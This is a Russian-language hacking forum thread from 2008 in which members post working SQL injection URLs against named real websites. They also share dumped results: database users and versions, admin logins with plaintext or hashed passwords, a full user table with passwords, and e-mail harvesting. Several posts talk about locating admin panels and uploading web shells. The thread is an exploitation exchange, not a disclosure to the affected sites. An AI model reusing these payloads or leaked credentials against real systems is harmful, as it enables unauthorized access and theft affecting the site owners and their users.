ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6271  
Старый 11.08.2008, 02:21
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Ахтунг! =)

http://www.stayer.su/index.php?res=collection&cmd=view&id=-1+union+select+concat(login,0x3a3a,password,0x3a3a ,name,0x3a3a3a3a)+from+users+limit+0,1/*

Сначала пытался потыкать админовскими реквизитами в формочку авторизации на главной страничке сего чудного сайта. Не получилось. Хитрый администратор спрятал мою админку в http://www.stayer.su/adm

Логинимся. Заливаем шел.

Юзаем: тут был шел ...

Последний раз редактировалось Cennarios; 11.08.2008 в 16:04..
 
Ответить с цитированием

  #6272  
Старый 11.08.2008, 11:22
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://bdigital.biz/index.php?pageid=214+AND+ascii(lower(substring(ver sion(),1,1)))=51

version=3.*.*.*
 
Ответить с цитированием

  #6273  
Старый 11.08.2008, 14:52
Аватар для S0ulVortex
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

http://www.avtobamper.ru/item_view.php?id=49&item_id=-1+union+select+1,2,3,Version(),5,user(),7,database (),9,10,11,12,13/*
Можно чёнють седлать? Пытался нече неполучилось
Вот ещё немагу найти админку, все нашол а админку нет
http://www.good-food.ru/

Последний раз редактировалось S0ulVortex; 11.08.2008 в 15:16..
 
Ответить с цитированием

  #6274  
Старый 11.08.2008, 16:34
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://hutro.com/index.php?pageid=15+union+select+1,2,concat_ws(0x3 a,user(),database(),version()),4,5,6,7,8,9,10,11,1 2--
hutro_hutro@localhost:hutro_hutro:4.1.22-standard-log

http://hutro.com/index.php?pageid=15+union+select+1,2,table_name,4, 5,6,7,8,9,10,11,12+from+information_schema.tables+ limit+0,1--
выдает:
Код:
SELECT * FROM aadm_menu WHERE id=15 union select 1,2,table_name,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 0,1--: SELECT command denied to user 'hutro_hutro'@'localhost' for table 'tables'

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/hutro/public_html/index.php on line 86
 
Ответить с цитированием

  #6275  
Старый 11.08.2008, 17:08
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

вообще без вывода: http://biomac.ru/index.php?pageid=117+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19--

http://biomac.ru/index.php?pageid=117+AND+ascii(lower(substring(ver sion(),1,1)))=52--
version() = 4.*.*.*

edited:
http://www.amanda-nylons.com/index.php?pageID='
странно как-то -) order+by говорит что 1 колонка, а union+select+1 никак вообще. мож кто разберется.

Последний раз редактировалось Calcutta; 11.08.2008 в 18:51..
 
Ответить с цитированием

  #6276  
Старый 11.08.2008, 17:36
Аватар для mister
mister
Познающий
Регистрация: 24.07.2007
Сообщений: 31
Провел на форуме:
1417840

Репутация: 35
Отправить сообщение для mister с помощью ICQ
По умолчанию

Цитата:
Сообщение от Calcutta  
вообще без вывода: http://biomac.ru/index.php?pageid=117+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19--

http://biomac.ru/index.php?pageid=117+AND+ascii(lower(substring(ver sion(),1,1)))=52--
version() = 4.*.*.*
http://biomac.ru/index.php?pageid=-117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19--
 
Ответить с цитированием

  #6277  
Старый 11.08.2008, 18:15
Аватар для Zircool
Zircool
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
Провел на форуме:
519496

Репутация: 78
Отправить сообщение для Zircool с помощью ICQ
По умолчанию

Сайт: www.blackratpress.co.uk PR=5

Цитата:
http://www.blackratpress.co.uk/event.php?id=9+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7+from+admin_login+limit+2,1/*
Админка:

Цитата:
http://www.blackratpress.co.uk/admin/
Логин и пароль админа:
Цитата:
abovo:1010cambourne
Пытался залить шелл, ничего не получлось, у кого получится отпостите...
 
Ответить с цитированием

  #6278  
Старый 11.08.2008, 19:31
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.aliyahjobcenter.org/page.php?id=50[SQL]
DBname: israemploy
User: israemploy@localhost
Version: 5.0.45-log

Цитата:
user
id:loginassword:userTypeermissionLevel
1:yisrael:w3X-5j4Q:Programmer:3
2:danbarry:P*4t7r9~a$:Programmer:3
3:isaac:issac:Programmer:3
4:macron:n<5f3r8&K+:Regular:3
5:lubrob:w$2u5m9#G*:Regular:3
8:test:test:Regular:3
админку не нашол(( кто найдет - в личку плз.
 
Ответить с цитированием

  #6279  
Старый 11.08.2008, 19:40
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://crimeahouse.ru/index.php?pageId=24&id=-111+union+select+1,2,3,4,5,concat_ws(0x3a,user(),v ersion(),database()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57--
crimeahouseru@localhost:5.0.26-log:dbm_www_crimeahouse_ru

http://crimeahouse.ru/index.php?pageId=24&id=-111+union+select+1,2,3,4,5,mail,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50,51,52,53,54,55,56,57+from+mail+limit+72 3,1--
мыльники - самое интересное, что можно вытащить, кажется >_>
________________

http://www.makc-m.nnov.ru/faq.php?id_faq=-155+union+select+1,2,3,4,5
http://www.makc-m.nnov.ru/faq.php?id_faq=-155+union+select+1,table_name,3,4,5+from+informati on_schema.tables+limit+0,1--
Код:
SELECT * FROM faq WHERE id_faq=-155 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--
Error: SELECT command denied to user 'makcm'@'localhost' for table 'tables'
К сожалению, сервис Вопрос-Ответ недоступен

Последний раз редактировалось Calcutta; 11.08.2008 в 20:19..
 
Ответить с цитированием

  #6280  
Старый 11.08.2008, 20:25
Аватар для Momiji
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

fabbrigroup.com
Код:
http://www.fabbrigroup.com/rides.php?cat=-9+union+select+concat(0x3,version())/*
5.0.45fabbrigroup_com@localhostfabbrigroup_com
Код:
http://www.fabbrigroup.com/rides.php?cat=-9+union+select+password+from+fabbrigroup_users+limit+0,1/*
admin:aec5dd86377b6754b9509a775a0e2a26:ruotino
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ